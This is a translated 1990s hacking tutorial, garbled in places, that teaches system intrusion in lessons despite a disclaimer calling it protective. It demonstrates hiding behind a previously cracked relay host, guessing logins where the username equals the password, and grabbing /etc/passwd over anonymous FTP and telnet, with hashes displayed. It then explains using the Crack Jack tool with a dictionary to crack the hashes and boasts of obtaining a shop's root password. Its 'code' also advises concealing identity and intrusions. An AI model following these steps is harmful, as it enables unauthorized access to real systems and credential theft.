Author: CoolFire [coolfires@hotmail.com] (2001-10-12 15:00:00)
CoolHC Volume 1 By CoolFire Author E-Mail: coolfires@hotmail.com

Lin Zhenglong, a famous hacker in Taiwan, is the leader of Chinese hackers. Won COG information security Lifetime Achievement Award in 2011
Lin Zhenglong Baidu Encyclopedia

This is not a teaching document. It just tells you how to crack the system so that you can protect your system safely. If you can read this document completely, you can know how hackers invade your computer. I'm CoolFire. The purpose of this article is to let you understand the importance of computer security, It's not to teach people Crack Password. If someone invades someone's computer or network maliciously because of this file, I will not be responsible!!

1. What is Hacking?

It's about hacking into computers! What's the explanation? Most of the books or novels and documents about Hacker are clearly introduced. People who are addicted to computers Destroy... Alas! Just a lot of strange explanations. It's better not to be a Hacker. I No

2. Why do you want Hack?

We just want to understand more about the technology of the system, invade it, understand how it works, try its security, then learn to use it, read the instructions about the operation in the system, learn its various operations!! revolution for security!

3. Hack code

1. Do not maliciously damage any system, this will only bring you trouble. Maliciously damage other people's software will lead to legal punishment, if you only use the computer, it is only illegal use!! note: do not damage other people's software or data!!
2. Do not modify any system files. If you want to enter the system and modify it, please change it back to its original state after answering the purpose
3. Don't easily tell your untrusted friends that you want Hack's platform
4. Don't talk about anything about your Hack on bbs
5. Don't use your real name when you Post
6. Don't leave your computer when you are invading
7. Do not invade or damage the host of government agencies
8. Don't talk about anything about your Hack on the phone
9. Keep your notes in a safe place
10. If you want to be a Hacker, you need to really Hacking. Read all the files about system security or system vulnerability!
11. Accounts that have been hacked into the computer cannot be cleared or modified
12. It is not allowed to modify the system files. If the modification is made to hide the intrusion, it is not limited. However, it is still necessary to maintain the security of the original system and not open the door because of the control of the system!!
13. Do not share your cracked account with your friends

4. The way to solve

1. Enter the host
2. Get / etc/passwd
3. Get system account
4. Get the highest authority

How 1.

There are several ways to access the host, which can be accessed through Telnet (Port 23) or SendMail (Port 25) or FTP or WWW (Port 80). Although a host has only one address, it can provide multiple services at the same time, so if you just want to "access" the host, these ports are good directions. Of course, there are many ports, But what can you do with DayTime's Port??? I don't know, do you know?!

The following demonstration is not as easy as it is written out, just to let you know how to enter. Of course, there are many problems, such as wrong command Wait a minute I didn't show up in class, but I did it for face We must delete these ugly things

Demonstrate how to enter the host: (By CoolFire)

(first, connect to a Telnet host with an account you already have. Of course, it's better to be a fake host, that is, a cracked host. Then use it to Crack other hosts, so that others won't find out where you are by countercurrent method.)

Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec   2 03:24:00 from 255.255.0.0

I use ms.hinet.net Of course, it's fake. It has been modified!! there's no such host!! don't be afraid! Don't be afraid! The following host names are fake. Please remember!!)

Digital UNIX V1.2C   (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(um... Come in! Let's attack! This time, the target is )

ms.hinet.net> telnet www.fuckyou.hinet.net    (Telnet Have a try....)
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

(never mind, come again!!)

cool login: hinet
Password:
Login incorrect
cool login:

(I didn't guess right. I used the guessing method here. It seems that I have bad luck today.)

telnet> close
Connection closed.

(try another Port again!!)

ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.

<HTML>
<HEAD>
<TITLE>Error</TITLE>
</HEAD>
<BODY>
<H1>Error 400</H1>
Invalid request "" (unknown method)
<P><HR><ADDRESS><A HREF="http://www.w3.org">CERN-HTTPD 3.0A</A></ADDRESS>
</BODY>
</HTML>
Connection closed by foreign host.

(Wow!! I don't even have to enter the password. It's really Again!! be persistent!!)
(try FTP Port)

ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user!   This is an experimental FTP server.   If have any
230-unusual problems, please report them via e-mail to root@cool.com
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

(Wow! You can use anonymous to come in!! just type aaa @ in the password part! Don't leave footprints!!)

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.

(Uh huh... Great! Coming in! The next goal is )

ftp> cd etc
250 CWD command successful.
ftp> get passwd          (Catch back !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)

(oh... Is it so easy

ftp> !cat passwd       (Have a look !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash

(wow... It's Shadow It's a bad start )

ftp> bye
221 Goodbye.

Don't believe in evil As the old saying goes, we should have perseverance )
(FTP doesn't work. Try Telnet again!!)

ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

(guess wrong again!!)

cool login: fuckyou
Password:
Last login: Mon Dec   2 09:20:07 from 205.11.122.12
Linux 1.2.13.
Some programming languages manage to absorb change but withstand
progress.
cool:~$  

(Wahaha!! which stupid root, use system name as username and password as system name Finally... No white play... )

cool:~$ system
bash: system: command not found

(um... This user doesn't seem to have much permission )

cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/       cdrom/        lib/          mnt/          tmp/          www/
README        dev/          linux*        proc/         usr/
bin/          etc/          local/        root/         var/
boot/         home/         lost+found/   sbin/         
cool:/$ cd etc
telnet> quit

(I really want to sleep!! no more playing!! next class )

Connection closed.
ms.hinet.net> exit

(left!! I'll see you next class!! it's here today! The teacher has to work first!!)
(some students say: cheat! Haven't cracked yet!! nonsense! Haven't you come in yet??? Look at what's in this class???- > enter the main engine!! mmm )

How 2.

In the last lesson, I grabbed a "mess" of / etc/passwd. Do you think I'm really stupid? What's the good thing that guest can grab? So this lesson continues the last attack. In the last lesson, we have "guessed" a username and password that is not a guest. Let's use it to enter the host today!!

Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec   2 03:24:00 from 255.255.0.0
Digital UNIX V1.2C   (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(um... Come in! Let's attack! This time, the target is Ah... )

ms.hinet.net> telnet cool.fuckyou.hinet.net    (Telnet Have a try.... Yesterday's address, Take notes!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
cool login: fuckyou
Password:              (Same input fuckyou)
Last login: Mon Dec   1 12:44:10 from ms.hinet.net
Linux 1.2.13.
cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS          ftpusers            localtime           resolv.conf
HOSTNAME            gateways            magic               rpc
NETWORKING          group               mail.rc             securetty
NNTP_INEWS_DOMAIN   host.conf           motd                sendmail.cf
X11@                hosts               messages/               sendmail.st
XF86Config          hosts.allow         mtab                services
at.deny             hosts.deny          mtools              shells
bootptab            hosts.equiv         named.boot          shutdownp
csh.cshrc           hosts.lpd           networks            snoopy/
csh.login           httpd.conf          nntpserver          slip.hosts
exports             inetd.conf          passwd              snooptab
fastboot            inittab             passwd.OLD          syslog.conf
fdprm               issue               passwd.old          syslog.pid
fstab               ld.so.cache         printcap            ttys
ftpaccess           ld.so.conf          profile             utmp@

(looking for the target It's too messy! I'm too lazy to find it. Come again )

cool:/etc$ ls pa*
passwd       passwd.OLD   passwd.old

(as expected)

cool:/etc$ more passwd

(see if there is Shadow )

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(on time! There's no defense at all!!)

cool:/etc$ exit
logout

(left!... FTP to play!)

Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)
ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(look! Oh! It can't be fake!!..)

ftp> bye
221 Goodbye.
ms.hinet.net> exit

(San renluo!! class is over!!... Oh, slow down. There's something else to explain )
The shadow of passwd is to put passwd in the shadow file. The passwd format you saw in the first lesson is not the real passwd
root::0:0:root:/root:/bin/bash
Because there's nothing in the part of the code So it's useless to take it!! but what do you get in this class? Like this, what do you need to explain is what does it mean???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

It is divided into several fields with ":". The comparison of each field is as follows:

User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh

Come on! Come on! Keep the passwd you've worked hard to get. Let's talk about how to use Crack Jack to decode passwd in the third lesson Ha ha... zzZZzZzz...

HOW3.

Crack Jack V1.4 instructions in Chinese (By CoolFire 12-1-1996)

Um... It's time for lesson 3!! let's go for a drink of water for the tired students first! Let's talk about Crack Jack in this lesson! This is a good tool to interpret / etc/passwd. Don't tell me that you are used to using Brute. Compare the speed of Brute and Crack Jack, and you can immediately throw yourself into the embrace of Crack Jack 1.4, but first make sure that you use Crack Jack 1.4, which you can use in CoolFire Take this version of Crack Jack from hacker & mailer page! This is the really useful version. Speed Yes... It's just that no one else can match it! But we still need to talk about its shortcomings You can only run in dos and OS2. If you run in DOS Mode on Windoz 95, it will not even care about you!

OK! Now let's get to the point! etc/passwd! Let's start! The things we need before using Crack Jack 1.4 are these [1] Crack Jack 1.4 $% ^ & @ @ [2] / etc/passwd file, you can find the passwd [3] dictionary file in the / etc / directory of Unix system Oh, ClayMore has a dictionary with more than 1000 words, but it's much smaller than my dictionary. It's also in LetMeIn! 1.0. Listen to James
When we say 2.0 Release, there will be better dictionary files included. Look forward to it Before using Crack Jack 1.4, you need to make sure that the machine you are using has 386 or more CPU s! Then you'd better have enough memory!!

At the beginning of Jack, just type jack. It will ask you PW Name Enter your passwd file name, dictionarynameenter your dictionary file name, Jack will start to find it! When you find it, you will be told, and the password it found will be written in JACK.POT!! but Strange format! If you find a password with root permission, Jack will tell you this isajackass Um... Swearing!! because it takes too much time to use Jack. If you want to stop halfway, just
Just press Ctrl-C, don't think you've lost all your efforts! Because Jack has a RESTORE function, it will be automatically saved as RESTORE when it is interrupted. Next time you want to continue this search, just enter Jack RESTORE: RESTORE!! of course, you can rename your RESTORE! Jack will also find it For example, if you want to search after Ren restore restore.HNT, just Jack -Restore:RESTORE.HNT Jack will automatically RESTORE the last string he was looking for Keep looking for you

Where to find the dictionary file: I won't give it to you! You can find other programs such as Brute Force. Some of them will be attached, or you can find other Hacker underground stations to see if there is one. You can make one by yourself, or find an English Chinese dictionary software to solve the part of the dictionary, which may have some information fields and the basis for writing programs

[no example in this lesson] successful case: found the root password of an online coffee shop! Jack is on time!!! Time taken: about 20 minutes But I can't find it in a day or two Woo... Hackers! Come on!!
Continue